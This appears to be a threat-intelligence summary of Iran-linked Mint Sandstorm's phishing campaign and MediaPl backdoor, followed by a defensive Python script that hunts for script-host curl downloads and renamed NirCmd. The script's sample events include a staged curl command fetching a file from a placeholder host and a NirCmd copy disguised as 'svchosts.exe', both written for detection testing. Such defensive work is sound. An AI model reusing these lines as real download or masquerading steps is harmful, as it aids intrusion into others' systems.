Iran-linked threat actors [1] [5] [6] [7] [8], tracked by Microsoft as Mint Sandstorm [3] [5] [6] [9] and also known as APT35 [1] [3] [5] [6] [7] [9] or Charming Kitten [3] [5] [6] [7] [9], have been conducting a sophisticated social engineering campaign targeting high-profile researchers involved in the Israel-Hamas conflict [5] [6]. The activity is attributed to a subgroup of APT35 [7], which is also known as Charming Kitten or Phosphorus [7], and the phishing campaign has been running since November 2023.

Description

These threat actors use customized phishing lures and, in some cases, a new custom backdoor called MediaPl [1] [3] [4] [6] [7] to trick targets into downloading malicious files and to steal sensitive data. The attackers send hand-crafted emails that often bypass email security services [7], aiming to socially engineer targets into downloading malicious files [2] [7] [9]. This ongoing campaign focuses on experts who have the potential to influence intelligence and policies related to Iran's interests [5] [6], particularly regarding Palestine and Israel [7]. The targets primarily consist of individuals working at universities and research organizations in Belgium [5], France [2] [5] [6] [9], Gaza [2] [3] [5] [6] [9], Israel [2] [3] [5] [6] [7] [9], the UK [2] [3] [5] [6] [9], and the US [2] [3] [5] [6] [9].

Mint Sandstorm [1] [2] [3] [4] [5] [6] [7] [8] [9], which some vendors also associate with APT42 [1] [9], operates as a state-sponsored actor and targets governments [1], NGOs [1], private entities [1], and academia for espionage [1]. The group has been observed using compromised accounts to send phishing lures and continuously improving its tooling to evade detection [1]. The deployment of the custom backdoor MediaPl indicates an evolution in its cyber espionage capabilities [1].

The motivation behind Mint Sandstorm’s activities appears to be espionage and intelligence gathering aligned with Iran’s geopolitical interests [1], rather than direct financial gain [1]. Security teams should be aware of potential dangers such as cross-sector infiltration [1], intellectual property theft and espionage [1] [4], erosion of trust in digital communications [1], and the expansion of cyber conflict [1].

Conclusion

Mint Sandstorm [1] [2] [3] [4] [5] [6] [7] [8] [9], an Iran-linked threat actor associated with Iran's IRGC [8], has been actively targeting high-profile individuals at universities and research organizations since November 2023 [8]. Its recently observed tradecraft includes phishing from compromised email accounts [8], using curl commands to connect to its servers [8], and deploying the MediaPl backdoor [8]. Mint Sandstorm impersonates well-known figures and tailors its phishing lures to gain the trust of targets before delivering malicious content [8]. Microsoft has detected various files and backdoors used by Mint Sandstorm [8], including .vbs scripts and renamed versions of NirCmd [8]. The group's remote access capabilities pose a significant threat to system confidentiality [8], prompting Microsoft to enhance detection measures to defend against Mint Sandstorm [8].
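The two host-level behaviours named above (a .vbs lure driving curl to reach the attackers' server, and a renamed copy of NirCmd) are the kind of thing a detection engineer can hunt for in process-creation telemetry. The script below is an added example written for this page; it is not Microsoft's detection logic or any code from the reporting. Field names (Image, ParentImage, CommandLine, OriginalFileName) are modeled on Sysmon Event ID 1, the assumption that NirCmd's PE version resource carries the original filename is just that, and the sample events are constructed, with the URL deliberately pointing at a reserved .invalid domain.

```python
"""Hunt for two TTPs from the Mint Sandstorm reporting in process-creation
events: a script host (wscript/cscript running a .vbs) launching curl to
reach a remote server, and a renamed NirCmd binary.

Added example, not code from the page or from Microsoft. Event field names
are modeled on Sysmon Event ID 1; all events below are constructed."""
import ntpath
import re

# Script hosts that execute the .vbs lures described in the reporting.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# PE OriginalFileName values that should match the on-disk name; a mismatch
# means the tool was renamed to blend in. (Assumes the PE version resource is
# populated and that the telemetry source records it.)
RENAME_WATCHLIST = {"nircmd.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path; ntpath works on any OS."""
    return ntpath.basename(path).lower()


def analyze_event(ev: dict) -> list:
    """Return a list of human-readable findings for one process event."""
    findings = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    original = ev.get("OriginalFileName", "").lower()

    # 1. curl spawned by a script host: a .vbs lure pulling a second stage
    #    or calling home. Ordinary users rarely run curl from wscript.
    if image == "curl.exe" and parent in SCRIPT_HOSTS:
        urls = URL_RE.findall(cmd)
        target = urls[0] if urls else "?"
        findings.append(f"script-host curl download: parent={parent} url={target}")

    # 2. renamed NirCmd: the PE says NirCmd.exe but the file on disk does not.
    if original in RENAME_WATCHLIST and image != original:
        findings.append(f"renamed {original}: running as {image}")

    return findings


def hunt(events) -> list:
    """Run analyze_event over every event; return (ProcessId, finding) pairs."""
    hits = []
    for ev in events:
        for finding in analyze_event(ev):
            hits.append((ev.get("ProcessId"), finding))
    return hits


# Constructed sample telemetry: two suspicious events and two benign ones.
SAMPLE_EVENTS = [
    {   # .vbs lure fetching a file over curl (suspicious)
        "ProcessId": 4100,
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'curl.exe -o C:\Users\Public\update.dat https://example.invalid/update',
    },
    {   # an admin running curl from a shell (benign)
        "ProcessId": 4101,
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "curl.exe https://example.invalid/status",
    },
    {   # NirCmd renamed to look like a system binary (suspicious)
        "ProcessId": 4102,
        "Image": r"C:\Users\Public\svchosts.exe",
        "OriginalFileName": "NirCmd.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": "svchosts.exe win hide title \"Update\"",
    },
    {   # NirCmd under its own name in a tools folder (not flagged here)
        "ProcessId": 4103,
        "Image": r"C:\Tools\nircmd.exe",
        "OriginalFileName": "NirCmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "nircmd.exe mutesysvolume 1",
    },
]

if __name__ == "__main__":
    for pid, finding in hunt(SAMPLE_EVENTS):
        print(f"PID {pid}: {finding}")
```

The two rules are intentionally narrow so they stay low-noise; in production you would feed real EDR or Sysmon events rather than the constructed list, and you may want to extend the rename watchlist to other dual-use admin tools the reporting names in your own environment.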

References

[1] https://www.scmagazine.com/news/iranian-threat-group-mint-sandstorm-targets-high-profile-middle-east-researchers
[2] https://thehackernews.com/2024/01/iranian-hackers-masquerades-as.html
[3] https://virtualattacks.com/researchers-and-universities-are-the-target-of-mint-sandstorm-apt/
[4] https://www.secureworld.io/industry-news/iranian-hackers-espionage-campaigns
[5] https://www.infosecurity-magazine.com/news/iranian-phishing-israel-hamas/
[6] https://ciso2ciso.com/iranian-phishing-campaign-targets-israel-hamas-war-experts-source-www-infosecurity-magazine-com/
[7] https://www.techradar.com/pro/security/microsoft-warns-of-new-spearphishing-attack-targeting-workers-at-top-companies
[8] https://cybersecuritynews.com/mint-sandstorm-attacking-researchers/
[9] https://vulners.com/thn/THN:EEAC55672CC55BB646CF4D79C6F45B59